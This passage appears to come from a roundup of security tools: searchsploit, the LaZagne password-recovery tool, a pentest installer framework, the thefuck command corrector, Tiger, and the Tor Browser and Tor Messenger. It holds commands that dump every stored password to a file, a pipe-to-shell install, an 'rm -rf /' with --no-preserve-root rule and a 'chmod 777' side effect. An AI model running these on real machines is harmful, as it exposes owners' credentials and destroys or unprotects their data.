Linux RAID md 0.9/1.0/1.1/1.2
RAID 1: mirroring
RAID 4: striped array with parity device
RAID 5: striped array with distributed parity
information
RAID 6: striped array with distributed dual
redundancy information
Linux Swap (versions 1 and 2)
LVM and LVM2, Linux Logical Volume Manager
Mac partition map
Novell Storage Services NSS
NTFS ( Windows NT/2000/XP/2003/Vista/2008/7 )
ReiserFS 3.5, 3.6 and 4
Sun Solaris i386 disklabel
Unix File System UFS and UFS2 (Sun/BSD/...)
XFS, SGI's Journaled File System
Wii WBFS
Sun ZFS

Download TestDisk
THE EXPLOIT-DATABASE GIT REPOSITORY

This is the official repository of The Exploit Database, a project
sponsored by Offensive Security.
The Exploit Database is an archive of public exploits and
corresponding vulnerable software, developed for use by
penetration testers and vulnerability researchers. Its aim is to
serve as the most comprehensive collection of exploits
gathered through direct submissions, mailing lists, and other
public sources, and present them in a freely-available and
easy-to-navigate database. The Exploit Database is a
repository for exploits and proof-of-concepts rather than
advisories, making it a valuable resource for those who need
actionable data right away.
This repository is updated daily with the most recently added
submissions.
Included with this repository is the searchsploit utility, which
will allow you to search through the exploits using one or more
terms.
root@kali:~# searchsploit -h
  Usage: searchsploit [OPTIONS] term1 [term2] ... [termN]
  Example: searchsploit oracle windows local

=========
 OPTIONS
=========
   -c         - Perform case-sensitive searches; by default, searches will try to be greedy
   -v         - By setting verbose output, description lines are allowed to overflow their columns
   -h, --help - Show help screen

NOTES:
 - Use any number of search terms you would like (minimum: 1)
 - Search terms are not case sensitive, and order is irrelevant

root@kali:~# searchsploit afd windows local
--------------------------------------------------------------- | ---------------------------------
 Description                                                    | Path
--------------------------------------------------------------- | ---------------------------------
 MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plug | /windows/local/6757.txt
 Microsoft Windows xp AFD.sys Local Kernel DoS Exploit          | /windows/dos/17133.c
 Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (M | /windows/local/18176.py
 Windows - AfdJoinLeaf Privilege Escalation (MS11-080)          | /windows/local/21844.rb
--------------------------------------------------------------- | ---------------------------------
root@kali:~#

Download The Exploit-Database Git Repository


THE LAZAGNE PROJECT - RECOVER MOST COMMON
SOFTWARE PASSWORDS (FIREFOX, IE, OPERA,
CHROME, FILEZILLA, WINSCP, COREFTP, WIFI AND
MANY MORE)

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, using an API, custom algorithms, etc.). This tool has been developed to find these passwords for the most common software. At this moment, it supports 22 programs on Windows and 12 on Linux.
Usage

Launch all modules
cmd: laZagne.exe all
Launch only a specific module
cmd: laZagne.exe
example: laZagne.exe browsers
help: laZagne.exe -h
Launch only a specific software script
cmd: laZagne.exe
example: laZagne.exe browsers -f
help: laZagne.exe browsers -h
Write all passwords found into a file (-w option)
cmd: laZagne.exe all -w

Supported software

Windows (tested on Windows XP, 7 and 8 - 32 and 64 bits)
  browsers: firefox, chrome, opera, ie
  chats: skype, pidgin, jitsi
  mails: thunderbird, outlook
  adminsys: filezilla, puttycm, winscp, cyberduck, coreFTP, FTPNavigator
  database: sqldeveloper, squirrel, dbvisualizer
  svn: tortoise
  wifi: Wireless Network Password (Windows mechanism)
  windows credentials: Domain visible network (.Net Passport), Generic network credentials
Linux
  browsers: firefox, opera
  chats: pidgin, jitsi
  mails: thunderbird
  adminsys: filezilla, environment variables
  database: sqldeveloper, squirrel, dbvisualizer
  wifi: network manager
  wallet: gnome keyring

IE Browser history

Internet Explorer passwords (from IE7 and before Windows 8) can only be decrypted using the URL of the website. This one is used as an argument of the Win32 CryptUnprotectData API. So to decrypt it, it is necessary to retrieve the browser history of IE. To do that, I have used C code. So I used a DLL (the code is in the "browser_history_dll" directory) and it is directly embedded in the Python code as a base64 string (cf. ie.py). Once launched, the DLL is written to the disk, a wrapper is used to call DLL functions and then the DLL file is removed from the disk.

Build your own password recovery script

It is possible to write your own script for the software of your choice.
To do that, some syntax requirements are needed:
Create a class using the name of the software
This class has to have a function called "retrieve_password" (it will be the main function)
The output containing all passwords has to be sent to the "print_output" function - ex: print_output(, password_list)
password_list has to be an array of dictionaries.
Optional: you could use the function "print_debug" to print your output
ex: print_debug("ERROR", "Failed to load ...")
Use an existing script to understand what I have said :)
If you want to improve this tool, you could send me your script and it will be added to this project (authors will of course be credited on each script ;)).
Requirements

To compile the source code, some external libraries are required.
For Windows
Wconio (for the color)
http://newcenturycomputers.net/projects/wconio.html
http://newcenturycomputers.net/projects/download.cgi/WConio-1.5.win32-py2.7.exe
Python for Windows Extensions
http://sourceforge.net/projects/pywin32/
For Linux
None

Download The LaZagne Project


THE PENETRATION TESTERS FRAMEWORK (PTF) - IS A
WAY FOR MODULAR SUPPORT FOR UP-TO-DATE TOOLS

A TrustedSec Project - The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important. PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine.
Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you. The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.
Instructions:

First check out the config/ptf.config file which contains the base location of where to install everything. By default this will install in the /pentest directory. Once you have that configured, move to running PTF by typing ./ptf (or python ptf).
This will put you in a Metasploit-esque type shell which has a similar look and feel for consistency. show modules, use, etc. are all accepted commands. First things first, always type help or ? to see a full list of commands.
Update EVERYTHING!
If you want to install and/or update everything, simply do the following:
./ptf
use modules/install_update_all
run

This will install all of the tools inside of PTF. If they are already installed, this will iterate through and update everything for you automatically.
You can also use show options to change information about the modules.

Modules:
First, head over to the modules/ directory; inside of there are sub directories based on the Penetration Testing Execution Standard (PTES) phases. Go into those phases and look at the different modules. As soon as you add a new one, for example testing.py, it will automatically be imported next time you launch PTF. There are a few key components when looking at a module that must be completed.
Below is a sample module

Module Development:
All of the fields are pretty easy; on the repository locations, right now all that's supported is GIT. The plan in the next release is to expand to a file downloader. This can still be accomplished through after commands (explained later). Fill in the depends, and where you want the install location to be. PTF will take where the python file is located (for example exploitation) and move it to what you specify in the PTF config (located under config). By default it installs all your tools to /pentest//
Note in modules, you can specify after commands {INSTALL_LOCATION}. This will append where you want the install location to go when using after commands.
After Commands:
After commands are commands that you can insert after an installation. This could be switching to a directory and kicking off additional commands to finish the installation. For example in the BEEF scenario, you need to run ruby install-beef afterwards. Below is an example of after commands using the {INSTALL_LOCATION} flag.
AFTER_COMMANDS="cp config/dict/rockyou.txt {INSTALL_LOCATION}"
For AFTER_COMMANDS that do self install (don't need user interaction) - place an exit after your commands so it exits the shell.

Download The Penetration Testers Framework


THEFUCK - MAGNIFICENT APP WHICH CORRECTS YOUR
PREVIOUS CONSOLE COMMAND

Few examples:
➜ apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

➜ fuck
sudo apt-get install vim [enter/↑/↓/ctrl+c]
[sudo] password for nvbn:
Reading package lists... Done
...

➜ git push
fatal: The current branch master has no upstream branch.
To push the current branch and set the remote as upstream, use

    git push --set-upstream origin master

➜ fuck
git push --set-upstream origin master [enter/↑/↓/ctrl+c]
Counting objects: 9, done.
...

➜ puthon
No command 'puthon' found, did you mean:
 Command 'python' from package 'python-minimal' (main)
 Command 'python' from package 'python3' (main)
zsh: command not found: puthon

➜ fuck
python [enter/↑/↓/ctrl+c]
Python 3.4.2 (default, Oct  8 2014, 13:08:17)
...

➜ git brnch
git: 'brnch' is not a git command. See 'git --help'.

Did you mean this?
    branch

➜ fuck
git branch [enter/↑/↓/ctrl+c]
* master

➜ lein rpl
'rpl' is not a task. See 'lein help'.

Did you mean this?
    repl

➜ fuck
lein repl [enter/↑/↓/ctrl+c]
nREPL server started on port 54848 on host 127.0.0.1 nrepl://127.0.0.1:54848
REPL-y 0.3.1
...

If you are not scared to blindly run the changed command, there is a require_confirmation settings option:

➜ apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

➜ fuck
sudo apt-get install vim
[sudo] password for nvbn:
Reading package lists... Done
...

Requirements

python (2.7+ or 3.3+)
pip
python-dev

Installation [experimental]

On Ubuntu and OS X you can install The Fuck with the installation script:
wget -O - https://raw.githubusercontent.com/nvbn/thefuck/master/install.sh | sh - && $0

Manual installation
Install The Fuck with pip:
sudo pip install thefuck

Or using an OS package manager (OS X, Ubuntu, Arch).
You should place this command in your .bash_profile, .bashrc, .zshrc or other startup script:
eval "$(thefuck --alias)"
# You can use whatever you want as an alias, like for Mondays:
eval "$(thefuck --alias FUCK)"

Or in your shell config (Bash, Zsh, Fish, Powershell, tcsh).
Changes will be available only in a new shell session. To make them available immediately, run source ~/.bashrc (or your shell config file like .zshrc).
Update
sudo pip install thefuck --upgrade

Aliases changed in 1.34.


How it works

The Fuck tries to match a rule for the previous command, creates a new command using the matched rule and runs it.
Rules enabled by default are as follows:
cargo runs cargo build instead of cargo;
cargo_no_command fixes wrong commands like cargo buid;
cd_correction spellchecks and corrects failed cd commands;
cd_mkdir creates directories before cd'ing into them;
cd_parent changes cd.. to cd ..;
composer_not_command fixes composer command name;
cp_omitting_directory adds -a when you cp a directory;
cpp11 adds missing -std=c++11 to g++ or clang++;
dirty_untar fixes tar x command that untarred in the current directory;
dirty_unzip fixes unzip command that unzipped in the current directory;
django_south_ghost adds --delete-ghost-migrations to a django south migration that failed because of ghosts;
django_south_merge adds --merge to inconsistent django south migration;
docker_not_command fixes wrong docker commands like docker tags;
dry fixes repetitions like git git push;
fix_alt_space replaces Alt+Space with Space character;
fix_file opens a file with an error in your $EDITOR;
git_add fixes "Did you forget to 'git add'?";
git_branch_delete changes git branch -d to git branch -D;
git_branch_list catches git branch list in place of git branch and removes created branch;
git_checkout fixes branch name or creates new branch;
git_diff_staged adds --staged to previous git diff with unexpected output;
git_fix_stash fixes git stash commands (misspelled subcommand and missing save);
git_not_command fixes wrong git commands like git brnch;
git_pull sets upstream before executing previous git pull;
git_pull_clone clones instead of pulling when the repo does not exist;
git_push adds --set-upstream origin $branch to previous failed git push;
git_push_pull runs git pull when push was rejected;
git_stash stashes your local modifications before rebasing or switching branch;
git_two_dashes adds a missing dash to commands like git commit -amend or git rebase -continue;
go_run appends .go extension when compiling/running Go programs;
grep_recursive adds -r when you are trying to grep a directory;
gulp_not_task fixes misspelled gulp tasks;
has_exists_script prepends ./ when script/binary exists;
heroku_not_command fixes wrong heroku commands like heroku log;
history tries to replace command with most similar command from history;
java removes .java extension when running Java programs;
javac appends missing .java when compiling Java files;
lein_not_task fixes wrong lein tasks like lein rpl;
ls_lah adds -lah to ls;
man changes manual section;
man_no_space fixes man commands without spaces, for example mandiff;
mercurial fixes wrong hg commands;
mkdir_p adds -p when you are trying to create a directory without its parent;
mvn_no_command adds clean package to mvn;
mvn_unknown_lifecycle_phase fixes misspelled lifecycle phases with mvn;
no_command fixes wrong console commands, for example vom/vim;
no_such_file creates missing directories with mv and cp commands;
open prepends http to address passed to open;
pip_unknown_command fixes wrong pip commands, for example pip instatl/pip install;
python_command prepends python when you are trying to run a python script that is not executable or is run without ./;
python_execute appends missing .py when executing Python files;
quotation_marks fixes uneven usage of ' and " when containing args;
rm_dir adds -rf when you are trying to remove a directory;
sed_unterminated_s adds missing '/' to sed's s commands;
sl_ls changes sl to ls;
ssh_known_hosts removes host from known_hosts on warning;
sudo prepends sudo to previous command if it failed because of permissions;
switch_lang switches command from your local layout to en;
systemctl correctly orders parameters of confusing systemctl;
test.py runs py.test instead of test.py;
touch creates missing directories before "touching";
tsuru_login runs tsuru login if not authenticated or session expired;
tsuru_not_command fixes wrong tsuru commands like tsuru shell;
tmux fixes tmux commands;
unknown_command fixes hadoop hdfs-style "unknown command", for example adds missing '-' to the command on hdfs dfs ls;
vagrant_up starts up the vagrant instance;
whois fixes whois command.

Enabled by default only on specific platforms:
apt_get installs app from apt if it is not installed (requires python-commandnotfound / python3-commandnotfound);
apt_get_search changes trying to search using apt-get with searching using apt-cache;
brew_install fixes formula name for brew install;
brew_unknown_command fixes wrong brew commands, for example brew docto/brew doctor;
brew_upgrade appends --all to brew upgrade as per Homebrew's new behaviour;
pacman installs app with pacman if it is not installed (uses yaourt if available);
pacman_not_found fixes package name with pacman or yaourt.

Bundled, but not enabled by default:
git_push_force adds --force to a git push (may conflict with git_push_pull);
rm_root adds --no-preserve-root to rm -rf / command.
Creating your own rules

For adding your own rule you should create your-rule-name.py in ~/.thefuck/rules. The rule should contain two functions:
match(command: Command) -> bool
get_new_command(command: Command) -> str | list[str]

Also the rule can contain an optional function
side_effect(old_command: Command, fixed_command: str) -> None
and optional enabled_by_default, requires_output and priority variables.
Command has three attributes: script, stdout and stderr.
Rules api changed in 3.0: For accessing settings in a rule you need to import it with from thefuck.conf import settings. settings is a special object filled with ~/.thefuck/settings.py and values from env (see more below).
Simple example of the rule for running script with sudo:
import subprocess

def match(command):
    return ('permission denied' in command.stderr.lower()
            or 'EACCES' in command.stderr)

def get_new_command(command):
    return 'sudo {}'.format(command.script)

# Optional:
enabled_by_default = True

def side_effect(command, fixed_command):
    subprocess.call('chmod 777 .', shell=True)

priority = 1000  # Lower first, default is 1000

requires_output = True

More examples of rules, utility functions for rules, app/OS-specific helpers.
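As an added example that is not one of thefuck's own rules, here is a rule written to the contract above that handles the git push failure shown earlier on this page by parsing the branch name out of stderr, with a side_effect that only records what was rewritten instead of changing file permissions; the Command stand-in is an assumption so the rule can run outside thefuck.

```python
import re
from collections import namedtuple

# Stand-in for thefuck's Command object (assumption): inside thefuck the real
# object is passed in and carries the same three attributes named on this page.
Command = namedtuple("Command", ["script", "stdout", "stderr"])

# git prints this line when the branch has no upstream; the rule takes the
# branch name from it instead of guessing.
_NO_UPSTREAM = re.compile(
    r"fatal: The current branch (?P<branch>\S+) has no upstream branch\.")

requires_output = True      # the rule reads stderr, so thefuck must capture output
enabled_by_default = True
priority = 500              # lower than the default 1000, so it is tried first

# Record of rewrites made by side_effect (hypothetical replacement for the
# chmod side effect in the page's example: it changes nothing on disk).
AUDIT_LOG = []


def match(command):
    """True only for a failed git push whose stderr names the missing upstream."""
    return (command.script.startswith("git push")
            and _NO_UPSTREAM.search(command.stderr) is not None)


def get_new_command(command):
    """Rewrite `git push ...` into `git push --set-upstream origin <branch> ...`."""
    branch = _NO_UPSTREAM.search(command.stderr).group("branch")
    rest = command.script[len("git push"):].strip()   # keep any extra arguments
    new = "git push --set-upstream origin {}".format(branch)
    return "{} {}".format(new, rest) if rest else new


def side_effect(old_command, fixed_command):
    """Optional hook: note the rewrite; nothing is executed here."""
    AUDIT_LOG.append((old_command.script, fixed_command))


# Constructed sample stderr, copied from the git output shown earlier on this page.
SAMPLE_STDERR = (
    "fatal: The current branch master has no upstream branch.\n"
    "To push the current branch and set the remote as upstream, use\n"
    "\n"
    "    git push --set-upstream origin master\n")

if __name__ == "__main__":
    cmd = Command("git push", "", SAMPLE_STDERR)
    if match(cmd):
        fixed = get_new_command(cmd)
        side_effect(cmd, fixed)
        print(fixed)   # git push --set-upstream origin master
```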


Settings

The Fuck has a few settings parameters which can be changed in ~/.thefuck/settings.py:
rules list of enabled rules, by default thefuck.conf.DEFAULT_RULES;
exclude_rules list of disabled rules, by default [];
require_confirmation requires confirmation before running new command, by default True;
wait_command max amount of time in seconds for getting previous command output;
no_colors disable colored output;
priority dict with rules priorities, rule with lower priority will be matched first;
debug enables debug output, by default False.
Example of settings.py:
rules = ['sudo', 'no_command']
exclude_rules = ['git_push']
require_confirmation = True
wait_command = 10
no_colors = False
priority = {'sudo': 100, 'no_command': 9999}
debug = False

Or via environment variables:
THEFUCK_RULES list of enabled rules, like DEFAULT_RULES:rm_root or sudo:no_command;
THEFUCK_EXCLUDE_RULES list of disabled rules, like git_pull:git_push;
THEFUCK_REQUIRE_CONFIRMATION require confirmation before running new command, true/false;
THEFUCK_WAIT_COMMAND max amount of time in seconds for getting previous command output;
THEFUCK_NO_COLORS disable colored output, true/false;
THEFUCK_PRIORITY priority of the rules, like no_command=9999:apt_get=100, rule with lower priority will be matched first;
THEFUCK_DEBUG enables debug output, true/false.
For example:
export THEFUCK_RULES='sudo:no_command'
export THEFUCK_EXCLUDE_RULES='git_pull:git_push'
export THEFUCK_REQUIRE_CONFIRMATION='true'
export THEFUCK_WAIT_COMMAND=10
export THEFUCK_NO_COLORS='false'
export THEFUCK_PRIORITY='no_command=9999:apt_get=100'

Developing
Install The Fuck for development:
pip install -r requirements.txt
python setup.py develop

Run unit tests:
py.test

Run unit and functional tests (requires docker):
py.test --enable-functional

For sending package to pypi:
sudo apt-get install pandoc
./release.py

Download Thefuck
TIGER - THE UNIX SECURITY AUDIT AND INTRUSION
DETECTION TOOL

Tiger is a security tool that can be used both as a security audit and intrusion detection system. It supports multiple UNIX platforms and it is free and provided under a GPL license. Unlike other tools, Tiger needs only POSIX tools and is written entirely in shell language.
Tiger has some interesting features that merit its resurrection, including a modular design that is easy to expand, and its double edge: it can be used as an audit tool and a host intrusion detection system tool. Free Software intrusion detection is currently going many ways, from network IDS (with Snort), to the kernel (LIDS, or SNARE for Linux and Systrace for OpenBSD, for example), not mentioning file integrity checkers (many of these: aide, integrit, samhain, tripwire...) and logcheckers (even more of these, check the Log Analysis pages). But few of them focus on the host-side of intrusion detection fully. Tiger complements these tools and also provides a framework in which all of them can work together. Tiger is not a logchecker, nor is it focused on integrity analysis. It does "the other stuff": it checks the system configuration and status. Read the manpage for a full description of checks implemented in Tiger. A good example of what Tiger can do is, for example, check_findeleted, a module that can determine which network servers running in a system are using deleted files (because libraries were patched during an upgrade but the server's services were not restarted).
Installation
sudo apt-get install tiger

Download Tiger
TOR BROWSER 4.5 - EVERYTHING YOU NEED TO SAFELY
BROWSE THE INTERNET

The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.
The Tor Browser lets you use Tor on Windows, Mac OS X, or
Linux without needing to install any software. It can run off a
USB flash drive, comes with a pre-configured web browser to
protect your anonymity, and is self-contained.
The 4.5 series provides significant usability, security, and
privacy enhancements over the 4.0 series. Because these
changes are significant, we will be delaying the automatic
update of 4.0 users to the 4.5 series for one week.
Usability Improvements

On the usability front, we've improved the application launch experience for both Windows and Linux users. During install, Windows users are now given the choice to add Tor Browser to the Start Menu/Applications view, which should make it easier to find and launch. This choice is on by default, but can be disabled, and only affects the creation of shortcuts - the actual Tor Browser is still self-contained as a portable app folder. On the Linux side, users now start Tor Browser through a new wrapper that enables launching from the File Manager, the Desktop, or the Applications menu. The same wrapper can also be used from the command line.
We've also simplified the Tor menu (the green onion) and the associated configuration windows. The menu now provides information about the current Tor Circuit in use for a page, and also provides an option to request a new Tor Circuit for a site. Tor Browser is also much better at handling Tor Circuits in general: while a site remains in active use, all associated requests will continue to be performed over the same Tor Circuit. This means that sites should no longer suddenly change languages, behaviors, or log you out while you are using them.

Figure 1: The new Tor Onion Menu

Security Improvements

On the security front, the most exciting news is the new Security Slider. The Security Slider provides user-friendly vulnerability surface reduction - as the security level is increased, browser features that were shown to have a high historical vulnerability count in the iSec Partners hardening study are progressively disabled. This feature is available from the Tor onion menu's "Privacy and Security Settings" choice.

Figure 2: The new Security Slider

Our Windows packages are now signed with a hardware signing token graciously donated by DigiCert. This means that Windows users should no longer be prompted about Tor Browser coming from an unknown source. Additionally, our automatic updates are now individually signed with an offline signing key. In both cases, these signatures can be reproducibly removed, so that builders can continue to verify that the packages they produce match the official build binaries.

The 4.5 series also features a rewrite of the obfs2, obfs3, and
ScrambleSuit transports in GoLang, as well as the introduction
of the new obfs4 transport. The obfs4 transport provides
additional DPI and probing resistance features which prevent
automated scanning for Tor bridges. As long as they are not
discovered via other mechanisms, fresh obfs4 bridge
addresses will work in China today. Additionally, barring new
attacks, private obfs4 addresses should continue to work
indefinitely.
Privacy Improvements

On the privacy front, the 4.5 series improves on our pre-existing first party isolation implementation to prevent third party tracking. First party isolation provides the property that third party advertisements, "like buttons", or "mashup" content that is included on one site will at most only know about your activity on that site, and will not be able to match it to your activity while you are on any other site. In other words, with first party isolation, Facebook, Twitter, and Google+ can't track you around the entire web using their infamous like buttons.
Specifically, in the 4.5 release, we now ensure that blob: URIs are scoped to the URL bar domain that created them, and the SharedWorker API has been disabled to prevent cross-site and third party communication. We also now make full use of Tor's circuit isolation to ensure that all requests for any third party content included by a site travel down the same Tor Circuit. This isolation also ensures that requests to the same third party site actually use separate Tor Circuits when the URL bar domain is different. This request isolation is enforced even when long-lived "HTTP Keep-Alive" connections are used.
We have also improved our resolution and locale fingerprinting defenses, and we now disable the device sensor and video statistics APIs.

New Search Provider

Our default search provider has also been changed to Disconnect. Disconnect provides private Google search results to Tor users without Captchas or bans.
Full Changelogs

Here is the complete list of changes in the 4.5 series since 4.0:
All Platforms
  Update Tor to 0.2.6.7 with additional patches:
    Bug 15482: Reset timestamp_dirty each time a SOCKSAuth circuit is used
  Update NoScript to 2.6.9.22
  Update HTTPS-Everywhere to 5.0.3
    Bug 15689: Resume building HTTPS-Everywhere from git tags
  Update meek to 0.17
  Include obfs4proxy 0.0.5
    Use obfs4proxy for obfs2, obfs3, obfs4, and ScrambleSuit bridges
  Pluggable Transport Dependency Updates:
    Bug 15265: Switch go.net repo to golang.org/x/net
    Bug 15448: Use golang 1.4.2 for meek and obfs4proxy
  Update Tor Launcher to 0.2.7.4. Changes since 0.2.7.0.2 in 4.0.8:
    Bug 11879: Stop bootstrap if Cancel or Open Settings is clicked
    Bug 13271: Display Bridge Configuration wizard pane before Proxy pane
    Bug 13576: Don't strip "bridge" from the middle of bridge lines
    Bug 13983: Directory search path fix for Tor Messenger+TorBirdy
    Bug 14122: Hide logo if TOR_HIDE_BROWSER_LOGO set
    Bug 14336: Fix navigation button display issues on some wizard panes
    Bug 15657: Display the host:port of any connection failures in bootstrap
    Bug 15704: Do not enable network if wizard is opened
  Update Torbutton to 1.9.2.2. Changes since 1.7.0.2 in 4.0.8:
    Bug 3455: Use SOCKS user+pass to isolate all requests from the same url domain
    Bug 5698: Use "Tor Browser" branding in "About Tor Browser" dialog
    Bug 7255: Warn users about maximizing windows
    Bug 8400: Prompt for restart if disk records are enabled/disabled.
    Bug 8641: Create browser UI to indicate current tab's Tor circuit IPs
      (Many Circuit UI issues were fixed during 4.5; see release changelogs for those).
    Bug 9387: Security Slider 1.0
      Include descriptions and tooltip hints for security levels
      Notify users that the security slider exists
      Make use of new SVG, jar, and MathML prefs
    Bug 9442: Add New Circuit button to Torbutton menu
    Bug 9906: Warn users before closing all windows and performing new identity.
    Bug 10216: Add a pref to disable the local tor control port test
    Bug 10280: Strings and pref for preventing plugin initialization.
    Bug 11175: Remove "About Torbutton" from onion menu.
    Bug 11236: Don't set omnibox order in Torbutton (to prevent translation)
    Bug 11449: Fix new identity error if NoScript is not enabled
    Bug 13019: Change locale spoofing pref to boolean
    Bug 13079: Option to skip control port verification
    Bug 13406: Stop directing users to download-easy.html.en on update
    Bug 13650: Clip initial window height to 1000px
    Bugs 13751+13900: Remove SafeCache cache isolation code in favor of C++ patch
    Bug 13766: Set a 10 minute circuit lifespan for non-content requests
    Bug 13835: Option to change default Tor Browser homepage
    Bug 13998: Handle changes in NoScript 2.6.9.8+
    Bug 14100: Option to hide NetworkSettings menuitem
    Bug 14392: Don't steal input focus in about:tor search box
    Bug 14429: Provide automatic window resizing, but disable for now
    Bug 14448: Restore Torbutton menu operation on non-English localizations
    Bug 14490: Use Disconnect search in about:tor search box
    Bug 14630: Hide Torbutton's proxy settings tab.
    Bug 14631: Improve profile access error msgs (strings for translation).
    Bugs 14632+15334: Display Cookie Protections only if disk records are enabled
    Bug 15085: Fix about:tor RTL text alignment problems
    Bug 15460: Ensure FTP urls use content-window circuit isolation
    Bug 15502: Wipe blob: URIs on New Identity
    Bug 15533: Restore default security level when restoring defaults
    Bug 15562: Bind SharedWorkers to third-party pref
  Bug 3455: Patch Firefox SOCKS and proxy filters to allow user+pass isolation
  Bug 4100: Raise HTTP Keep-Alive back to 115 second default
  Bug 5698: Fix branding in "About Torbrowser" window
  Bug 10280: Don't load any plugins into the address space by default
  Bug 11236: Fix omnibox order for non-English builds
    Also remove Amazon, eBay and bing; add Youtube and Twitter
  Bug 11955: Backport HTTPS Certificate Pinning patches from Firefox 32
  Bug 12430: Provide a preference to disable remote jar: urls
  Bugs 12827+15794: Create preference to disable SVG images (for security slider)
  Bug 13019: Prevent Javascript from leaking system locale
  Bug 13379: Sign our MAR update files
  Bug 13439: No canvas prompt for content callers
  Bug 13548: Create preference to disable MathML (for security slider)
  Bug 13586: Make meek use TLS session tickets (to look like stock Firefox).
  Bug 13684: Backport Mozilla bug #1066190 (pinning issue fixed in Firefox 33)
  Bug 13788: Fix broken meek in 4.5-alpha series
  Bug 13875: Spoof window.devicePixelRatio to avoid DPI fingerprinting
  Bug 13900: Remove 3rd party HTTP auth tokens via Firefox patch
  Bug 14392: Make about:tor hide itself from the URL bar
  Bug 14490: Make Disconnect the default omnibox search engine
  Bug 14631: Improve startup error messages for filesystem permissions issues
  Bugs 14716+13254: Fix issues with HTTP Auth usage and TLS connection info display
  Bug 14937: Hard-code meek and flashproxy node fingerprints
  Bug 15029: Don't prompt to include missing plugins
  Bug 15406: Only include addons in incremental updates if they actually update
  Bug 15411: Remove old (and unused) cacheDomain cache isolation mechanism
  Bug 15502: Isolate blob: URI scope to URL domain; block WebWorker access
  Bug 15562: Disable Javascript SharedWorkers due to third party tracking
  Bug 15757: Disable Mozilla video statistics API extensions
  Bug 15758: Disable Device Sensor APIs
Linux
  Bug 12468: Only print/write log messages if launched with --debug
  Bug 13375: Create a hybrid GUI/desktop/shell launcher wrapper
  Bug 13717: Make sure we use the bash shell on Linux
  Bug 15672: Provide desktop app registration+unregistration for Linux
  Bug 15747: Improve start-tor-browser argument handling
Windows
  Bug 3861: Begin signing Tor Browser for Windows the Windows way
  Bug 10761: Fix instances of shutdown crashes
  Bug 13169: Don't use /dev/random on Windows for SSP
  Bug 14688: Create shortcuts to desktop and start menu by default (optional)
  Bug 15201: Disable 'runas Administrator' codepaths in updater
  Bug 15539: Make installer exe signatures reproducibly removable
Mac
  Bug 10138: Switch to 64bit builds for MacOS
Here is the list of changes since the last 4.5 alpha (4.5a5):

All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Update obfs4proxy to 0.0.5
Update Tor Launcher to 0.2.7.4
Bug 15704: Do not enable network if wizard is
opened
Bug 11879: Stop bootstrap if Cancel or Open
Settings is clicked
Bug 13576: Don't strip "bridge" from the middle
of bridge lines

Bug 15657: Display the host:port of any connection failures in bootstrap
Update Torbutton to 1.9.2.2
Bug 15562: Bind SharedWorkers to thirdparty
pref
Bug 15533: Restore default security level when
restoring defaults
Bug 15510: Close Tor Circuit UI control port
connections on New Identity
Bug 15472: Make node text black in circuit
status UI
Bug 15502: Wipe blob URIs on New Identity
Bug 15795: Some security slider prefs do not
trigger custom checkbox
Bug 14429: Disable automatic window resizing
for now
Bug 4100: Raise HTTP Keep-Alive back to 115
second default
Bug 13875: Spoof window.devicePixelRatio to avoid
DPI fingerprinting
Bug 15411: Remove old (and unused) cacheDomain
cache isolation mechanism
Bugs 14716+13254: Fix issues with HTTP Auth
usage and TLS connection info display
Bug 15502: Isolate blob URI scope to URL domain;
block WebWorker access
Bug 15794: Crash on some pages with SVG images
if SVG is disabled
Bug 15562: Disable Javascript SharedWorkers due
to third party tracking
Bug 15757: Disable Mozilla video statistics API
extensions
Bug 15758: Disable Device Sensor APIs
Linux
Bug 15747: Improve start-tor-browser argument
handling

Bug 15672: Provide desktop app registration + unregistration for Linux
Windows
Bug 15539: Make installer exe signatures
reproducibly removable
Bug 10761: Fix instances of shutdown crashes

Download Tor Browser 4.5


TOR MESSENGER - CHAT OVER TOR, EASILY

Tor Messenger is a cross-platform chat program that aims to be
secure by default and sends all of its traffic over Tor. It supports
a wide variety of transport networks, including Jabber (XMPP),
IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and
others; enables Off-the-Record (OTR) Messaging
automatically; and has an easy-to-use graphical user interface
localized into multiple languages.

WHAT IT ISN'T...
Tor Messenger builds on the networks you are familiar with, so
that you can continue communicating in a way your contacts
are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the
relationships between contacts) can be logged by the server.
However, your route to the server will be hidden because you
are communicating over Tor.
We are also excited about systems like Pond and Ricochet,
which try to solve this problem, and would encourage you to
look at their designs and use them too.

WHY INSTANTBIRD?
We considered a number of messaging clients: Pidgin, Adam
Langley's xmpp-client, and Instantbird. Instantbird was the
pragmatic choice -- its transport protocols are written in a
memory-safe language (JavaScript); it has a graphical user
interface and already supports many natural languages; and it's
a XUL application, which means we can leverage both the code
(Tor Launcher) and in-house expertise that the Tor Project has
developed working on Tor Browser with Firefox. It also has an
active and vibrant software developer community that has been
very responsive and understanding of our needs. The main
feature it lacked was OTR support, which we have
implemented and hope to upstream to the main Instantbird
repository for the benefit of all Instantbird (and Thunderbird)
users.

INSTRUCTIONS

